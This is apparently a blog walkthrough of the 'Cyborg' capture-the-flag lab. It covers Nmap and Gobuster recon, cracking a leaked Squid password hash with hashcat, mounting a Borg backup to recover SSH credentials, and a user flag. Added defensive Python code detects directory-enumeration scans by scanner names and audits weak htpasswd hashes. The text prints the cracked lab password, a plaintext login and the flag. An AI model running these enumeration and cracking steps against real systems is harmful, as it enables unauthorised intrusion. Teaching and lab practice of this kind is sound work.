Cyborg Room Walkthrough

2024-11-17

Room Overview

Room URL: Cyborg

Room IP: 10.10.79.217 - This will be different for you.

Recon

We begin our reconnaissance phase by scanning the target using Nmap. This helps us identify the open ports and services running on the machine.

Starting Nmap 7.60 ( https://nmap.org ) at 2024-10-28 16:28 GMT
Nmap scan report for ip-10-10-79-217.eu-west-1.compute.internal (10.10.79.217)
Host is up (0.018s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
|   256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_  256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:1F:A9:A5:69:89 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

Web Enumeration

Next, we perform directory enumeration using Gobuster to find hidden directories on the web server.

root@ip-10-10-53-222:~# gobuster dir -u 10.10.79.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.79.217
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 312] [--> http://10.10.79.217/admin/]
/etc                  (Status: 301) [Size: 310] [--> http://10.10.79.217/etc/]
/server-status        (Status: 403) [Size: 277]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
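
From the defender's side, the scan above is easy to spot in the web server's access log: Gobuster announces itself in the User-Agent, and even with a spoofed agent a client that mostly receives 404s stands out. The following is an added example, not part of the original walkthrough; the log lines are constructed, and the thresholds and the extra scanner names in the pattern are assumptions to tune for your own traffic.

```python
import re
from collections import defaultdict

def _line(ip, path, status, ua):
    return f'{ip} - - [28/Oct/2024:16:30:00 +0000] "GET {path} HTTP/1.1" {status} 277 "-" "{ua}"'

# Constructed sample traffic in Apache "combined" format (not real logs).
SAMPLE_LOG = "\n".join(
    [_line("10.10.53.222", p, s, "gobuster/3.6") for p, s in
     [("/images", 404), ("/admin", 301), ("/etc", 301), ("/backup", 404), ("/server-status", 403)]]
    + [_line("10.10.9.9", f"/guess{i}", 404, "Mozilla/5.0") for i in range(6)]
    + [_line("10.10.7.7", "/", 200, "Mozilla/5.0"),
       _line("10.10.7.7", "/admin/admin.html", 200, "Mozilla/5.0")]
)

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" '
                     r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SCANNER_UA = re.compile(r"gobuster|dirbuster|ffuf|feroxbuster", re.I)

def detect_enumeration(log_text, min_requests=5, miss_ratio=0.8):
    """Return {client_ip: {"reasons": [...], "discovered": [...]}} for suspected scanners."""
    stats = defaultdict(lambda: {"total": 0, "miss": 0, "ua": False, "hits": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        s = stats[m["ip"]]
        s["total"] += 1
        s["ua"] = s["ua"] or bool(SCANNER_UA.search(m["ua"]))
        if m["status"] == "404":
            s["miss"] += 1
        else:
            s["hits"].add(f'{m["path"]} ({m["status"]})')
    findings = {}
    for ip, s in stats.items():
        reasons = []
        if s["ua"]:
            reasons.append("scanner user agent")
        if s["total"] >= min_requests and s["miss"] / s["total"] >= miss_ratio:
            reasons.append("high 404 ratio")
        if reasons:
            # Paths that did NOT return 404 are what the scanner learned about the site.
            findings[ip] = {"reasons": reasons, "discovered": sorted(s["hits"])}
    return findings

if __name__ == "__main__":
    for ip, finding in detect_enumeration(SAMPLE_LOG).items():
        print(ip, finding)
```

The "discovered" list is the part worth acting on: it shows which paths, such as /admin and /etc here, answered the scanner and should not be reachable from the web root.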

Accessing Admin Panel

We found an admin panel at http://10.10.79.217/admin/admin.html.

http://10.10.79.217/admin/admin.html

Admin
Admin Shoutbox

[Yesterday at 4.32pm from Josh]
Are we all going to watch the football game at the weekend??

[Yesterday at 4.33pm from Adam]
Yeah Yeah mate absolutely hope they win!

[Today at 5.45am from Alex]
Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy I mentioned earlier...

Extracting Credentials from Squid Configuration

The configuration for the Squid proxy can be found in the squid.conf file:

auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users

From the password file, we can extract a hashed password:

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

Using Hashcat, we can crack this password:

hashcat --user cyborg rockyou.txt
$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward
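
The password fell to a wordlist because the entry uses the $apr1$ scheme, which is salted MD5 with only 1000 rounds. The following added example (not part of the original walkthrough) audits an htpasswd-style file and flags entries stored with weak schemes. Only the first sample entry comes from this page; the other entries are constructed placeholders, and the minimum bcrypt cost of 10 is an assumed policy value.

```python
import re

# Hash-scheme prefixes seen in htpasswd-style files, checked in order.
RULES = [
    (re.compile(r"^\$apr1\$"), "apr1-md5", True),              # salted MD5, 1000 rounds
    (re.compile(r"^\{SHA\}"), "sha1-unsalted", True),          # single unsalted SHA-1
    (re.compile(r"^\$2[aby]\$\d{2}\$"), "bcrypt", False),
    (re.compile(r"^\$5\$"), "sha256-crypt", False),
    (re.compile(r"^\$6\$"), "sha512-crypt", False),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "des-crypt", True),   # 8-char limit, 12-bit salt
]

def classify(hash_field, min_bcrypt_cost=10):
    """Return (scheme, is_weak) for one hash field. min_bcrypt_cost is an assumed policy."""
    for pattern, scheme, weak in RULES:
        if pattern.match(hash_field):
            if scheme == "bcrypt":
                weak = int(hash_field[4:6]) < min_bcrypt_cost  # cost sits after "$2y$"
            return scheme, weak
    return "plaintext-or-unknown", True

def audit(text):
    """Return a list of (line_number, user, scheme, is_weak) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, hash_field = line.partition(":")
        if not sep or not user:
            findings.append((lineno, None, "malformed", True))
            continue
        hash_field = hash_field.split(":", 1)[0]  # ignore any extra trailing fields
        findings.append((lineno, user) + classify(hash_field))
    return findings

SAMPLE = "\n".join([
    "music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.",  # entry shown on this page
    "svc_sha:{SHA}" + "A" * 27 + "=",                       # constructed placeholder
    "svc_fast:$2y$05$" + "A" * 53,                          # constructed, low bcrypt cost
    "svc_ok:$2y$12$" + "A" * 53,                            # constructed
    "legacy:ab" + "A" * 11,                                 # constructed DES-crypt shape
    "no-colon-here",                                        # constructed malformed line
])

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

A stronger scheme only slows guessing; the file was readable here because the web server served /etc, so the audit belongs alongside removing that exposure.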

Downloading the Archive

After cracking the password, we can download the archive from the admin menu:

root@ip-10-10-53-222:~# tar xvf archive.tar 

Working with Borg Backup

Next, we will install Borg Backup and mount the backup repository:

apt install borgbackup
root@ip-10-10-53-222:~/home/field/dev/final_archive# mkdir /tmp/a
root@ip-10-10-53-222:~/home/field/dev/final_archive# borg mount . /tmp/a 
Enter passphrase for key /root/home/field/dev/final_archive: 

After mounting, we can navigate to the user’s documents:

root@ip-10-10-53-222:/tmp/a/music_archive/home/alex# cat ./Documents/note.txt ./Desktop/secret.txt 
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:S3cretP@s3

SSH Access

Using the password found in the note, we can SSH into the target as the user alex:

ssh alex@10.10.79.217

Once logged in, we can access user flags:

alex@ubuntu:~$ cat user.txt 
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

Privilege Escalation

Lastly, we analyze the backup.sh script to identify any potential for privilege escalation:

alex@ubuntu:~$ cat /etc/mp3backups/backup.sh
#!/bin/bash

sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

Conclusion

This room provided a hands-on experience with various techniques including web enumeration, password cracking, and exploiting a backup system for privilege escalation. The knowledge gained here is invaluable for real-world scenarios in penetration testing.


Authored By Amit Agarwal

Amit Agarwal, Linux and Photography are my hobbies.

Creative Commons Attribution 4.0 International License.
